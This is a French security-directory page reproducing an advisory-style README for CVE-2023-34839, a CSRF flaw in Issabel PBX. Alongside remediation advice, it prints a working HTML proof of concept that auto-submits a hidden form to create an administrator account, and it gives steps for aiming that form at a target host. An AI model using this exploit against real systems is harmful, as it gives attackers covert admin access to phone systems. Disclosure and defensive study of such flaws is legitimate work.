Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-34839 — CVE-2023-34839 est une vulnérabilité de falsification de requête intersite (CSRF) découverte dans Issabel PBX version 4.0.0-6, une plateforme de communications unifiées open source largement utilisée. | Kitploit
Outils/GitHubGitHub/sahiloj/cve-2023-34839
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 est une vulnérabilité de falsification de requête intersite (CSRF) découverte dans Issabel PBX version 4.0.0-6, une plateforme de communications unifiées open source largement utilisée.

Voir le dépôt
531il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-34839 — Issabel PBX 4.0.0-6 : CSRF vers escalade de privilèges

CVE Severity CVSS Affected Version


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Logiciel affecté
  • Score CVSS
  • Scénario d'attaque
  • Preuve de concept (PoC)
  • Étapes pour reproduire
  • Impact
  • Remédiation
  • Références
  • Avertissement

Aperçu

CVE-2023-34839 est une vulnérabilité de Cross-Site Request Forgery (CSRF) découverte dans , une plateforme de communications unifiées open-source largement utilisée. La vulnérabilité réside dans le point de terminaison de gestion des utilisateurs et permet à un attaquant distant non authentifié de créer silencieusement un nouveau compte administrateur en trompant un administrateur actuellement authentifié pour qu'il visite une page web spécialement conçue.

Issabel PBX version 4.0.0-6
ChampValeur
ID CVECVE-2023-34839
Date23 juin 2023
ChercheurSahil Ojha
FournisseurIssabel
ProduitIssabel PBX
Version4.0.0-6
Testé surWindows

Détails de la vulnérabilité

Issabel PBX 4.0.0-6 n'implémente pas de protections CSRF (par exemple, jetons de synchronisation, attributs de cookie SameSite ou validation des en-têtes Origin / Referer) sur le point de terminaison de création d'utilisateur :

root@kitploit:~
POST /index.php?menu=userlist&action=new

Étant donné que l'application repose uniquement sur les cookies de session pour l'authentification et n'effectue aucune validation des requêtes modifiant l'état, une requête POST forgée provenant de n'importe quelle origine sera acceptée et traitée avec tous les privilèges de la session administrateur connectée.

Cause racine : Absence de validation de jeton anti-CSRF sur les points de terminaison administratifs modifiant l'état.

Classe de vulnérabilité : CWE-352 — Cross-Site Request Forgery (CSRF)


Logiciel affecté

LogicielVersionStatut
Issabel PBX4.0.0-6Vulnérable ✔
  • Page d'accueil du fournisseur : https://www.issabel.org/
  • Code source : https://github.com/IssabelFoundation/issabelPBX

Score CVSS

MétriqueValeur
Vecteur CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Score de base8.8 (Élevé)
Vecteur d'attaqueRéseau
Complexité d'attaqueFaible
Privilèges requisAucun
Interaction utilisateurRequise (visite admin)
PortéeInchangée
ConfidentialitéÉlevée
IntégritéÉlevée
DisponibilitéÉlevée

Scénario d'attaque

Un attaquant peut exploiter cette vulnérabilité en suivant ces grandes étapes :

  1. Créer une page HTML malveillante contenant un formulaire caché ciblant le point de terminaison de création d'utilisateur d'Issabel PBX avec des valeurs contrôlées par l'attaquant (nom d'utilisateur, mot de passe, groupe = administrateur).
  2. Héberger la page malveillante sur un serveur ou l'envoyer à l'administrateur cible via un e-mail de phishing, un message de chat ou tout vecteur d'ingénierie sociale.
  3. Attendre que l'administrateur ouvre le lien alors qu'il dispose d'une session active et authentifiée avec l'application Issabel PBX.
  4. Le navigateur soumet automatiquement le formulaire en utilisant le cookie de session existant de la victime, ce qui amène l'application à créer silencieusement un nouveau compte administrateur.
  5. L'attaquant se connecte avec les nouvelles identifiants créés et dispose d'un accès administrateur complet au système PBX, y compris le routage des appels, les enregistrements, la configuration des trunk SIP et tous les paramètres système.

Aucune interaction au-delà d'une simple visite de page n'est requise de la part de la victime.


Preuve de concept (PoC)

⚠️ Uniquement à des fins éducatives et de tests autorisés.
Remplacez localhost par le nom d'hôte ou l'adresse IP de l'instance Issabel PBX cible.
Si vous testez contre un point de terminaison https:// avec un certificat auto-signé, vous devez d'abord visiter l'URL cible dans le même navigateur et accepter l'avertissement de certificat ; sinon, le navigateur bloquera la soumission du formulaire cross-origin.

root@kitploit:~
<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Le fichier d'exploit est également disponible dans ce dépôt : CSRF Exploit.html


Étapes pour reproduire

Prérequis

  • Une instance Issabel PBX 4.0.0-6 en fonctionnement.
  • Un compte administrateur avec une session navigateur active.
  • Un navigateur sur la même machine que la session administrateur.

Étape 1 — Connectez-vous à Issabel PBX en tant qu'administrateur

Accédez à l'interface web d'Issabel PBX et connectez-vous avec les identifiants administrateur.

Issabel PBX Login


Étape 2 — Préparez l'exploit CSRF

Copiez le code HTML de la PoC ci-dessus et enregistrez-le sous forme de fichier .html, en remplaçant localhost par le nom d'hôte ou l'adresse IP réelle de l'instance Issabel cible.

L'exploit utilise des champs de formulaire cachés pour soumettre silencieusement une requête POST de création de nouvel utilisateur à l'application. Lorsque la page se charge, le JavaScript intégré soumet immédiatement le formulaire sans aucune action visible de l'utilisateur.

CSRF Exploit HTML


Étape 3 — Ouvrez l'exploit dans le même navigateur

Ouvrez le fichier HTML enregistré dans le même navigateur (dans un nouvel onglet) alors que la session administrateur est toujours active. Le formulaire sera automatiquement soumis immédiatement après le chargement de la page.


Étape 4 — Vérifiez la création du nouveau compte administrateur

Revenez au panneau Gestion des utilisateurs d'Issabel PBX. Un nouveau compte utilisateur (dans cette PoC, nommé CSRF) aura été créé avec tous les privilèges Administrateur — sans aucune interaction supplémentaire au-delà de l'ouverture de la page d'exploit.

New Admin User Created


Impact

L'exploitation réussie de CVE-2023-34839 permet à un attaquant de :

  • Créer des comptes administrateur malveillants sur le système PBX, offrant un accès permanent en pleins privilèges.
  • Modifier le routage des appels et les trunk SIP, permettant l'écoute ou la fraude téléphonique.
  • Accéder aux enregistrements de messagerie vocale et aux enregistrements de détails d'appel (CDR), entraînant la divulgation d'informations sensibles.
  • Verrouiller les administrateurs légitimes en modifiant les mots de passe ou en supprimant des comptes existants.
  • Perturber les communications en modifiant ou en supprimant la configuration du PBX.

Étant donné que le compte malveillant persiste même après la fin de la session de la victime, l'attaquant conserve un accès indéfini jusqu'à ce que le compte soit découvert et supprimé.


Remédiation

Les administrateurs et développeurs d'Issabel PBX doivent appliquer les mesures d'atténuation suivantes :

  1. Implémenter des jetons anti-CSRF : Générez un jeton unique, imprévisible et lié à la session pour chaque formulaire modifiant l'état. Validez le jeton côté serveur avant de traiter toute requête POST.

  2. Appliquer SameSite=Strict ou SameSite=Lax sur les cookies de session : Cela indique aux navigateurs de ne pas envoyer de cookies sur les requêtes cross-site, empêchant ainsi les attaques CSRF classiques dans les navigateurs modernes.

  3. Valider les en-têtes Origin et Referer : Rejetez les requêtes dont l'en-tête Origin ou Referer ne correspond pas au domaine attendu de l'application.

  4. Exiger une ré-authentification pour les actions sensibles : Demandez à l'administrateur de saisir son mot de passe actuel avant d'autoriser la création de nouveaux comptes de niveau administrateur.

  5. Appliquer les derniers correctifs de sécurité : Surveillez la page de publication d'Issabel et le dépôt officiel pour les correctifs traitant cette CVE.


Références

  • NVD — CVE-2023-34839
  • OWASP — Cross-Site Request Forgery (CSRF)
  • CWE-352: Cross-Site Request Forgery
  • Issabel Official Website
  • IssabelFoundation/issabelPBX on GitHub

Avertissement

Ce dépôt est destiné strictement à des fins éducatives et de recherche en sécurité autorisée. Les informations et le code de preuve de concept fournis ici ne doivent être utilisés que contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester. L'utilisation non autorisée de cet exploit contre des systèmes que vous ne possédez pas est illégale et peut entraîner des poursuites pénales. L'auteur décline toute responsabilité en cas d'utilisation abusive des informations contenues dans ce dépôt.

Télécharger l’outil